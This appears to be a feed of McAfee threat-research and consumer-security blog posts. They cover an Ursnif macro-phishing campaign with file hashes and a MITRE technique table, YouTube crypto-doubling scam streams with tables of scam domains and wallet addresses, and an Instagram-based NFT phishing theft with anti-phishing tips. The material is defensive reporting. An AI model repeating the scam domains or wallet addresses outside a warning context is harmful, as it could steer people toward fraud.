Main Word Document  6cf97570d317b42ef8bfd4ee4df21d217d5f27b73ff236049d70c37c5337909f  McAfee LiveSafe and Total Protection  X97M/Downloader.CJG 
Downloaded dll  41ae907a2bb73794bb2cff40b429e62305847a3e1a95f188b596f1cf925c4547  McAfee LiveSafe and Total Protection  Ursnif-FULJ 
URL to download dll  hxxp://  WebAdvisor  Blocked 

MITRE Attack Framework 

Technique ID  Tactic  Technique Details  Description 
T1566.001  Initial Access  Spear phishing Attachment  Manual execution by user 
T1059.005  Execution  Visual Basic  Malicious VBA macros 
T1218.011  Defense Evasion  Signed binary abuse  Rundll32.exe is used 
T1027  Defense Evasion  Obfuscation techniques  VBA and powershell base64 executions 
T1086  Execution  Powershell execution  PowerShell command abuse 


Macros are disabled by default in Microsoft Office applications, we suggest keeping it that way unless the document is received from a trusted source. The infection chain discussed in the blog is not limited to Word or Excel. Further threats may use other live-off-the-land tools to download its payloads.  

McAfee customers are protected against the malicious files and sites detailed in this blog with McAfee LiveSafe/Total Protection and McAfee Web Advisor. 

The post Phishing Campaigns featuring Ursnif Trojan on the Rise appeared first on McAfee Blog.

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Crypto Scammers Exploit: Elon Musk Speaks on Cryptocurrency

By McAfee Labs — May 5th 2022 at 21:19

By Oliver Devane 

Editors note: In the past 24 hours (from time of publication)  McAfee has identified 15 more scam sites bringing the total to 26. The combined value of the wallets shared on these sites is over $1,300,000 which is an increase of roughly $1,000,000 since this blog was last published. This highlights the scale of this current scam campaign. The table within this blog has been updated to include the new sites and crypto-wallets.

McAfee has identified several Youtube channels which were live-streaming a modified version of a live stream called ‘The B Word’ where Elon Musk, Cathie Wood, and Jack Dorsey discuss various aspects of cryptocurrency.  

The modified live streams make the original video smaller and put a frame around it advertising malicious sites that it claims will double the amount of cryptocurrency you send them. As the topic of the video is on cryptocurrency it adds some legitimacy to the websites being advertised.  

The original video is shown below on the left and a modified one which includes a reference to a scam site is shown on the right.  



We identified several different streams occurring at a similar same time. The images of some are shown below: 


The YouTube streams advertised several sites which shared a similar theme. They claim to send cryptocurrency worth double the value which they’ve received. For example, if you send 1BTC you will receive 2BTC in return. One of the sites frequently asked questions (FAQ) is shown below: 

Here are some more examples of the scam sites we discovered: 

The sites attempt to trick the visitors into thinking that others are sending cryptocurrency to it by showing a table with recent transactions. This is fake and is generated by JavaScript which creates random crypto wallets and amounts and then adds these to the table. 

The wallets associated with the malicious sites have received a large number of transactions with a combined value of $280,000 as of 5 PM UTC on the 5th of May 2022 

Scam Site  Crypto Type  Wallet  Value as on 5PM UTC 5th May 2022 
22ark-invest[.]org  ETH  0x820a78D8e0518fcE090A9D16297924dB7941FD4f  $25,726.46 
22ark-invest[.]org  BTC  1Q3r1TzwCwQbd1dZzVM9mdFKPALFNmt2WE  $29,863.78 
2xEther[.]com  ETH  0x5081d1eC9a1624711061C75dB9438f207823E694  $2,748.50 
2x-musk[.]net  ETH  0x18E860308309f2Ab23b5ab861087cBd0b65d250A  $10,409.13 
2x-musk[.]net  BTC  17XfgcHCfpyYMFdtAWYX2QcksA77GnbHN9  $4,779.47 
arkinvest22[.]net  ETH  0x2605dF183743587594A3DBC5D99F12BB4F19ac74  $11,810.57 
arkinvest22[.]net  BTC  1GLRZZHK2fRrywVUEF83UkqafNV3GnBLha  $5,976.80 
doublecrypto22[.]com  ETH  0x12357A8e2e6B36dd6D98A2aed874D39c960eC174  $0.00 
doublecrypto22[.]com  BTC  1NKajgogVrRYQjJEQY2BcvZmGn4bXyEqdY  $0.00 
elonnew[.]com  ETH  0xAC9275b867DAb0650432429c73509A9d156922Dd  $0.00 
elonnew[.]com  BTC  1DU2H3dWXbUA9mKWuZjbqqHuGfed7JyqXu  $0.00 
elontoday[.]org  ETH  0xBD73d147970BcbccdDe3Dd9340827b679e70d9d4  $18,442.96 
elontoday[.]org  BTC  bc1qas66cgckep3lrkdrav7gy8xvn7cg4fh4d7gmw5  $0.00 
Teslabtc22[.]com  ETH  0x9B857C44C500eAf7fAfE9ed1af31523d84CB5bB0  $27,386.69 
Teslabtc22[.]com  BTC  18wJeJiu4MxDT2Ts8XJS665vsstiSv6CNK  $17,609.62 
tesla-eth[.]org  ETH  0x436F1f89c00f546bFEf42F8C8d964f1206140c64  $5,841.84 
tesla-eth[.]org  BTC  1CHRtrHVB74y8Za39X16qxPGZQ12JHG6TW  $132.22 
teslaswell[.]com  ETH  0x7007Fa3e7dB99686D337C87982a07Baf165a3C1D  $9.43 
teslaswell[.]com  BTC  bc1qdjma5kjqlf7l6fcug097s9mgukelmtdf6nm20v  $0.00 
twittergive[.]net  ETH  0xB8e257C18BbEC93A596438171e7E1E77d18671E5  $25,918.90 
twittergive[.]net  BTC  1EX3dG9GUNVxoz6yiPqqoYMQw6SwQUpa4T  $99,123.42 

Scammers have been using social media sites such as Twitter and Youtube to attempt to trick users into parting ways with their cryptocurrency for the past few years. McAfee urges its customers to be vigilant and if something sounds too good to be true then it is most likely not legitimate.  

Our customers are protected against the malicious sites detailed in this blog as they are blocked with McAfee Web Advisor  

Type  Value  Product  Blocked 
URL – Crypto Scam  twittergive[.]net  McAfee WebAdvisor  YES 
URL – Crypto Scam  tesla-eth[.]org  McAfee WebAdvisor  YES 
URL – Crypto Scam  22ark-invest[.]org  McAfee WebAdvisor  YES 
URL – Crypto Scam  2xEther[.]com  McAfee WebAdvisor  YES 
URL – Crypto Scam  Teslabtc22[.]com  McAfee WebAdvisor  YES 
URL – Crypto Scam  elontoday[.]org  McAfee WebAdvisor  YES 
URL – Crypto Scam  elonnew[.]com  McAfee WebAdvisor  YES 
URL – Crypto Scam  teslaswell[.]com  McAfee WebAdvisor  YES 
URL – Crypto Scam  2x-musk[.]net  McAfee WebAdvisor  YES 
URL – Crypto Scam  doublecrypto22[.]com  McAfee WebAdvisor  YES 
URL – Crypto Scam  arkinvest22[.]net  McAfee WebAdvisor  YES 


The post Crypto Scammers Exploit: Elon Musk Speaks on Cryptocurrency appeared first on McAfee Blog.

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Instagram Hack Results in $1 Million Loss in NFTs

By McAfee — May 4th 2022 at 14:09

Imagine – your favorite brand on Instagram just announced a giveaway. You’ll receive a free gift! All you have to do is provide your credit card information. Sounds easy, right? This is a brand you’ve followed and trusted for a while now. You’ve engaged with them and even purchased some of their items. The link comes directly from their official page, so you don’t think to question it. 

This is the same mindset that led to several Bored Ape Yacht Club (BAYC) NFTs being stolen by a cybercriminal who had hacked into the company’s official Instagram account. Let’s dive into the details of this scam.  

Sneaking Into the Bored Ape Yacht Club 

Bored Ape Yacht Club, the NFT collection, disclosed through Twitter that their Instagram account had been hacked, and advised users not to click on any links or link their crypto wallets to anything. The hacker managed to log into the account and post a phishing link promoting an “airdrop,” or a free token giveaway, to users who connected their MetaMask wallets. Those who linked their wallets before BAYC’s warning lost a combined amount of over $1 million in NFTs. 

Despite the large price tag attached to NFTs, they are often held in smartphone wallets rather than more secure alternatives. MetaMask, the crypto wallet application, only allows NFT display through mobile devices and encourages users to use the smartphone app to manage them. While it may be a good method for display purposes, this limitation provides hackers with a new and effective way to easily steal from users’ mobile wallets. 

BAYC does not yet know how the hacker was able to gain access to their Instagram account, but they are following security best practices and actively working to contact the users affected. 

 N.F.T. – Not For Taking 

This scam was conducted through the official BAYC account, making it appear legitimate to BAYC’s followers. It is incredibly important to stay vigilant and know how to protect yourself and your assets from scams like these. Follow the tips below to steer clear of phishing scams and keep your digital assets safe:  

Ensure wallet security 

A seed phrase is the “open sesame” to your cryptocurrency wallet. The string of words is what grants you access to all your wallet’s assets. Ensuring that your seed phrase is stored away safely and not easily accessible by anyone but yourself is the first step to making sure your wallet is secure. 

Protect your privacy 

With all transactional and wallet data publicly available, scammers can pick and choose their targets based on who appears to own valuable assets. To protect your privacy and avoid being targeted, refrain from sharing your personal information on social media sites or using your NFT as a social media avatar. 

Look out for phishing scams 

Phishing scams targeting NFT collectors are becoming increasingly common. Be wary of any airdrops offering free tokens in exchange for your information or other “collectors” doing the same. 

Phishing scams tend to get more sophisticated over time, especially in cases like the Bored Ape Yacht Club where the malicious links are coming straight from the official account. It is always best to remain skeptical and cautious, but when in doubt, here are some extra tips to spot phishing scams: 

  • Is it written properly? A few spelling or grammar mistakes can be common, but many phishing messages will contain glaring errors that professional accounts or companies wouldn’t make. If you receive an error-filled message or promotion that requires giving your personal information, run in the other direction. 
  • Does the logo look right? Scammers will often steal the logo of whatever brand or company they’re impersonating to make the whole shtick look more legitimate. However, rarely do the logos look exactly how they’re supposed to. Pay close attention to any logo added in a message or link. Is the quality low? Is it crooked or off-center? Is it almost too small to completely make out? If yes, it’s most likely not the real deal. 
  • Is the URL legit? In any phishing scam, there will always be a link involved. To check if a link is actually legitimate, copy and paste the URL into a word processor where you can examine it for any odd spelling or grammatical errors. If you receive a strange link via email, hover over it with your mouse to see the link preview. If it looks suspicious, ignore and delete it. Even on mobile devices, you can press and hold the link with your finger to check out the legitimacy of the URL. 

As crypto and NFTs continue to take the world by storm, hackers and scammers are constantly on the prowl for ways to steal and deceive. No matter the source or how trustworthy it may seem at first glance, always exercise caution to keep yourself and your assets safe! 

The post Instagram Hack Results in $1 Million Loss in NFTs appeared first on McAfee Blog.
